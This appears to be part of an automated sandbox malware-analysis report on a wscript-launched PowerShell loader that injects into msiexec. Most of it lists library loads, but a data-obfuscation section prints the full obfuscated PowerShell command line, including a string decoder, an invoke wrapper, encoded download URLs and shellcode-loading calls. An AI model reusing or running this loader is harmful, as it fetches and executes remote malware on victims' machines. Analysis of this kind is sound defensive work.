              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: em.Core.pdbU source: powershell.exe, 00000003.00000002.1995087687.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: jqm.Core.pdb source: powershell.exe, 00000003.00000002.1995087687.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbC source: powershell.exe, 00000003.00000002.2002255520.0000000008845000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ore.pdb1226 source: powershell.exe, 00000003.00000002.1995087687.0000000007735000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2002255520.0000000008845000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2024582513.000000001FB2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2021729373.000000001F97D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2024582513.000000001FB2E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2021729373.000000001F97D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("POWERSHELL", ""<#Collybia Journalisation Utugtsforhol", "", "", "0");
              Source: Yara matchFile source: 00000003.00000002.2004279815.0000000008B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1987552917.0000000005E5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1872749558.000001F59006F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2005154167.0000000009D30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Uranophobia)$glObAl:mEsogLoEAl = [sYstEm.TExT.eNcoding]::aSCiI.GetSTriNg($TENtAcUlOcYsT)$GLobAl:OpsGNInGeR=$meSoGLOEal.sUBSTRIng($magaHi,$eLEndiGHEdenS)<#torturredskabernes Stamsde N
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Ingolfs $Recertificate200 $Euploeinae), (Relentingly @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Exdie = [AppDomain]::CurrentDomain.GetAssemblies()$glo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Slotsforvalternes)), $Tilbagekbsvrdien).DefineDynamicModule($Lastingness, $false).DefineType($Semirotund, $Renskrivning, [System.Multi
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Uranophobia)$glObAl:mEsogLoEAl = [sYstEm.TExT.eNcoding]::aSCiI.GetSTriNg($TENtAcUlOcYsT)$GLobAl:OpsGNInGeR=$meSoGLOEal.sUBSTRIng($magaHi,$eLEndiGHEdenS)<#torturredskabernes Stamsde N
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSp
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSp
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAB6163 push ebx; iretd 1_2_00007FFD9BAB616A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAB611C push eax; iretd 1_2_00007FFD9BAB613A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAB613C push eax; iretd 1_2_00007FFD9BAB613A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAB613C push edx; iretd 1_2_00007FFD9BAB614A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAB68DC pushad ; iretd 1_2_00007FFD9BAB68DD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BB879C3 push edi; ret 1_2_00007FFD9BB879C6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BB84116 push ss; iretd 1_2_00007FFD9BB84117
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0778A2D9 push FFFFFFE8h; iretd 3_2_0778A2DD
